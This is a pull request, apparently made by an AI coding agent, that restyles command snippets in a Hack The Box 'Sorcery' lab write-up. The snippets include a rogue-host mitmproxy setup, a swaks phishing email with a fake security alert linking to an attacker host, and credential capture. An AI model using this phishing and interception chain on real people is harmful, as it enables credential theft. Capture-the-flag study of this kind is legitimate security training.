### PR TITLE
style: colorize sorcery commands

### DIFF
--- a/_writeups/sorcery.md
+++ b/_writeups/sorcery.md
@@ -6,43 +6,30 @@ platform: Hack The Box
 
 Add the IPs to `/etc/hosts`:
 
-```
-10.10.11.73 sorcery.htb git.sorcery.htb
-10.10.14.40 pwn.sorcery.htb
-```
+<pre><code><span style="color:#ffffff">10.10.11.73 sorcery.htb git.sorcery.htb
+10.10.14.40 pwn.sorcery.htb</span></code></pre>
 
 Visit [https://sorcery.htb](https://sorcery.htb) and enumerate the repository:
 
-```
-git clone https://git.sorcery.htb/nicole_sullivan/infrastructure.git
-```
+<pre><code><span style="color:#00ff00">git</span><span style="color:#ffffff"> clone https://git.sorcery.htb/nicole_sullivan/infrastructure.git</span></code></pre>
 
 Enumerate virtual hosts with `ffuf`:
 
-```
-ffuf -w /usr/share/payloads/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u https://sorcery.htb -H "Host: FUZZ.sorcery.htb" -mc 200
-```
+<pre><code><span style="color:#00ff00">ffuf</span><span style="color:#ffffff"> -w /usr/share/payloads/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u https://sorcery.htb -H </span><span style="color:#ffd700">"Host: FUZZ.sorcery.htb"</span><span style="color:#ffffff"> -mc 200</span></code></pre>
 
 This reveals `git.sorcery.htb`; add it to `/etc/hosts` and create an account on the site, then log in.
 
 Capture traffic with a rogue host and `mitmproxy`:
 
-```
-sudo mitmproxy --mode reverse:https://git.sorcery.htb --certs pwn.sorcery.htb.pem -k -p 443
-```
+<pre><code><span style="color:#00ff00">sudo</span><span style="color:#ffffff"> </span><span style="color:#00ff00">mitmproxy</span><span style="color:#ffffff"> --mode reverse:https://git.sorcery.htb --certs pwn.sorcery.htb.pem -k -p 443</span></code></pre>
 
 Send a phishing email to capture credentials:
 
-```
-proxychains4 -f /etc/proxychains4.conf swaks --to tom_summers@sorcery.htb --from nicole_sullivan@sorcery.htb --server 172.19.0.10 --port 1025 --data "Subject: Security Alert\n\nPlease verify your account at https://pwn.sorcery.htb/user/login"
-```
+<pre><code><span style="color:#00ff00">proxychains4</span><span style="color:#ffffff"> -f /etc/proxychains4.conf </span><span style="color:#00ff00">swaks</span><span style="color:#ffffff"> --to tom_summers@sorcery.htb --from nicole_sullivan@sorcery.htb --server 172.19.0.10 --port 1025 --data </span><span style="color:#ffd700">"Subject: Security Alert\n\nPlease verify your account at https://pwn.sorcery.htb/user/login"</span></code></pre>
 
 Extract the captured credentials from the proxied session:
 
-```
-magick xwd:Xvfb_screen0 credentials.png
-open credentials.png
-```
+<pre><code><span style="color:#00ff00">magick</span><span style="color:#ffffff"> xwd:Xvfb_screen0 credentials.png
+</span><span style="color:#00ff00">open</span><span style="color:#ffffff"> credentials.png</span></code></pre>
 
 *Screenshots omitted.*
-


### PR DESCRIPTION
## Summary
- Deepen color of quoted strings in Sorcery command snippets for clearer contrast

## Testing
- `bundle exec jekyll build` *(bundler: command not found: jekyll)*
- `bundle install` *(Gem::Net::HTTPClientException 403 "Forbidden")*


------
https://chatgpt.com/codex/tasks/task_e_68b533d6007c832dac06a0bfcf578bd1